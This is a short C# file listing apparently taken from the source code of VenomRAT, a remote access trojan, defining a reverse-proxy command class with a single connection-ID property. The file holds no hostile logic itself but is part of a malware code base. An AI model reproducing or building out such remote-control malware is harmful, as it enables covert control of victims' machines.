VenomRat-SourceCode/ReverseProxy/ReverseProxyCommand.cs
2023-07-29 23:37:10 +05:30

7 lines
114 B
C#

namespace Server.ReverseProxy;
public class ReverseProxyCommand
{
public int ConnectionId { get; set; }
}